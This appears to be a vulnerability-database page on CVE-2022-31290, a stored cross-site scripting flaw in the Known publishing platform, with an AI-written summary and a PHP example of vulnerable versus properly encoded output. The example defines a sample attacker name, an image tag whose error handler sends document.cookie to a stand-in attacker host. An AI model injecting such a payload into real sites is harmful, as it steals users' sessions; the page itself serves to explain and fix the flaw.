VYPR
Moderate severity · NVD Advisory · Published Jul 8, 2022 · Updated Aug 3, 2024

CVE-2022-31290

Description

Stored XSS in Known v1.2.2+2020061101 allows authenticated attackers to inject arbitrary scripts via the 'Your Name' field.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The vulnerability is a stored cross-site scripting (XSS) issue in Known, a social publishing platform. The 'Your Name' text field does not properly sanitize user input, allowing authenticated users to inject arbitrary HTML and JavaScript [1].

Exploitation requires an authenticated account on the Known instance. The attacker crafts a payload and saves it in the 'Your Name' field. When other users view the attacker's profile or any page that displays the name, the script executes in their browser. No special network position is needed beyond normal web access.

Impact includes session hijacking or actions performed in the victim's authenticated context (outright cookie theft only where the session cookie is not marked HttpOnly), defacement, or redirection to malicious sites. Because the payload is stored server-side, it fires for every visitor who views the attacker's profile or any page that renders the name, so a single low-privilege account can reach the whole user base of the instance.

As of the publication date (2022-07-08), no patch is mentioned in the references, and the affected-package data on this page lists every version up to 1.3.1 as affected with no patched version. Upgrading alone therefore cannot be assumed to close the issue; administrators should apply context-appropriate output encoding to the display-name field wherever it is rendered (input validation on its own is not a reliable defence against XSS). The software is open-source (GitHub [2]), so administrators can review and fix the code themselves.

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: idno/known (Packagist)
Affected versions: <= 1.3.1
Patched versions: none listed

Affected products: 2

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

Improper neutralization of user-controllable input in the "Your Name" text field before it is rendered in web pages, leading to stored cross-site scripting.

Attack vector

An authenticated attacker injects a crafted payload containing arbitrary JavaScript or HTML into the "Your Name" text field. Because the application does not properly neutralize this user-controllable input before rendering it in web pages served to other users, the payload executes in the browsers of victims who view the attacker's profile or any page that displays the attacker's name [CWE-79]. The attack requires the attacker to have an authenticated session on the Known instance and the victim to visit a page where the unsanitized name is rendered.

Affected code

The advisory does not specify the exact file or function at fault. The vulnerability exists in the "Your Name" text field within Known v1.2.2+2020061101, which is a social publishing platform hosted at the idno/idno GitHub repository [1]. No patch file is provided in the bundle.

What the fix does

No patch is included in the bundle. The advisory does not describe a specific remediation. To close this vulnerability, the application should encode the "Your Name" value at the point of output, in every template that prints it, using escaping appropriate to the surrounding context (HTML entity encoding for element text and quoted attributes; a JSON/JavaScript-string encoding if the name is ever embedded in script), so that injected markup is displayed as text rather than interpreted as executable code [CWE-79]. Validating the value on input is at best a secondary control, since the stored value may already contain payloads and is reused in more than one rendering context.
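To make the flaw and the fix concrete, here is an added PHP example written for this page; it is not Known's own code, and the function names, the markup, and the attacker string are hypothetical. It models the vulnerable pattern (a stored display name concatenated straight into HTML) next to the hardened rendering for the three contexts a display name typically lands in: element text, a quoted attribute, and an inline script. It assumes PHP 8.0 or later.

```php
<?php
// Added example, not code from the Known project. Models how a stored
// 'Your Name' value reaches the page and how context-appropriate output
// encoding neutralises it. All names and markup below are hypothetical.

declare(strict_types=1);

// Constructed sample: a value an authenticated attacker could save as 'Your Name'.
const ATTACKER_NAME = '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the stored value is spliced into HTML unchanged, so the
// browser parses the <img> tag and runs onerror for every visitor who views
// any page that shows this name.
function render_name_vulnerable(string $name): string
{
    return '<span class="author">' . $name . '</span>';
}

// HTML text/attribute context. ENT_QUOTES also encodes ' and ", which makes the
// same helper safe inside a *quoted* attribute value; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string (a silent failure mode).
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_name_fixed(string $name): string
{
    return '<span class="author">' . esc_html($name) . '</span>';
}

// Attribute context: encoding is only sufficient when the attribute is quoted;
// an unquoted attribute can still be broken out of with a space.
function render_name_attr_fixed(string $name): string
{
    return '<a href="/profile" title="' . esc_html($name) . '">profile</a>';
}

// JavaScript context: HTML entity encoding is the wrong tool here. Emit a JSON
// literal with the HEX flags so quotes, '<', '>' and '&' are escaped and a
// "</script>" inside the name cannot terminate the script block.
function render_name_js_fixed(string $name): string
{
    $json = json_encode(
        $name,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return '<script>var authorName = ' . $json . ';</script>';
}

// Self-check: the vulnerable output still carries an executable handler, the
// fixed outputs contain no raw '<' originating from the attacker-controlled value.
function demo(): array
{
    $vuln  = render_name_vulnerable(ATTACKER_NAME);
    $fixed = render_name_fixed(ATTACKER_NAME);
    $js    = render_name_js_fixed(ATTACKER_NAME);
    return [
        'vulnerable_has_tag' => str_contains($vuln, '<img'),
        'fixed_has_tag'      => str_contains($fixed, '<img'),
        'js_has_raw_lt'      => str_contains(substr($js, strlen('<script>')), '<img'),
        'fixed_output'       => $fixed,
    ];
}

if (PHP_SAPI === 'cli') {
    foreach (demo() as $key => $value) {
        printf("%s: %s\n", $key, is_bool($value) ? var_export($value, true) : $value);
    }
}
```

Run with `php example.php`; `vulnerable_has_tag` prints true and the two fixed checks print false. If a deployment intentionally allows limited HTML in a profile field, encoding is the wrong fix and an allow-list HTML sanitiser is needed instead. A Content-Security-Policy without `'unsafe-inline'` limits what a payload like the one above can do, but it is defence in depth, not a substitute for encoding at output.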

Preconditions

  • Authentication: attacker must have an authenticated account on the Known instance
  • Input: victim must visit a page that renders the attacker's unsanitized display name

Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 7

News mentions: 0

No linked articles in our index yet.